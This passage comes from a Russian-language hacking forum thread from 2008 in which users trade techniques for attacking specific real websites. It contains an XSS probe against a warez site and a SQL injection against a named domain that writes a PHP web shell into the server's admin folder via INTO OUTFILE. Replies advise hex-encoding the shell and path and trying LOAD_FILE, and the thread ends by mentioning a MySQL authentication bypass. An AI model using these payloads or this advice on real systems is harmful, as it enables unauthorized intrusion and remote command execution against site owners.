Была найдена такая уязвимость: на одном варез сайте есть такой сервис, что если к адресу сайта подписать такое: site.ru/?site=ваш_сайт (без HTTP://), то на всех страницах сайта будет ссылка внизу страницы на ваш_сайт! Попробова ввести такой URL вида site.ru/fol/?list="><script>alert()</script> - выскакивает аларм )) попробовал ввести в URL php код - не прлучилось, вопросительные знаки режутся. Пробовал в разных кодировках - все бестолку. Но кроме знака вопроса больше ничего не режется! Вопрос собственно такой: как еще можно навредить сайту через эту уязвимость если сайт НЕ поддерживает куки? Там вообще даже нету регистрации юзеров.
есть скуль такого вида
danko.dn.ua/news.php?id=-17+union+select+1,'<?%20system($_GET[''cmd''])%20?>',3+from+mysql.user+into+outfile+''/usr/local/www/data/admin/fckeditor/_samples/php/gif.php/'
пишет Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /usr/local/www/data/news.php
ver-5.1.22-rc
user-root@localhost
http://danko.dn.ua/admin/fckeditor/_samples/php/
Последний раз редактировалось neon_fx; 29.04.2008 в 23:41..
даже после нормальной заливки шелла может возвращаться ошибка, и еще лучше шелл закодировать в hex, и точно кавычки не экранируются?
возможно нет прав/файл существует, вобщем по тем данным что ты дал, одназначно не скажешь
__________________ Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 29.04.2008 в 23:27..
есть скуль такого вида
danko.dn.ua/news.php?id=-17+union+select+1,'<?%20system($_GET[''cmd''])%20?>',3+from+mysql.user+into+outfile+''/usr/local/www/data/admin/fckeditor/_samples/php/gif.php/'
пишет Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /usr/local/www/data/news.php
ver-5.1.22-rc
user-root@localhost
http://danko.dn.ua/admin/fckeditor/_samples/php/
попробуй LOAD_FILE если не катит, попробуй в хекс закодировать путь до файла, если опять не катит, значит file_priv отключен, тогда забей, если все ок, то шелл в хекс и заливай.
Удаленный пользователь может представить специально обработанный авторизационный пакет, чтобы обойти механизм авторизации на MySQL сервере. Уязвимость расположена в check_scramble_323() функции.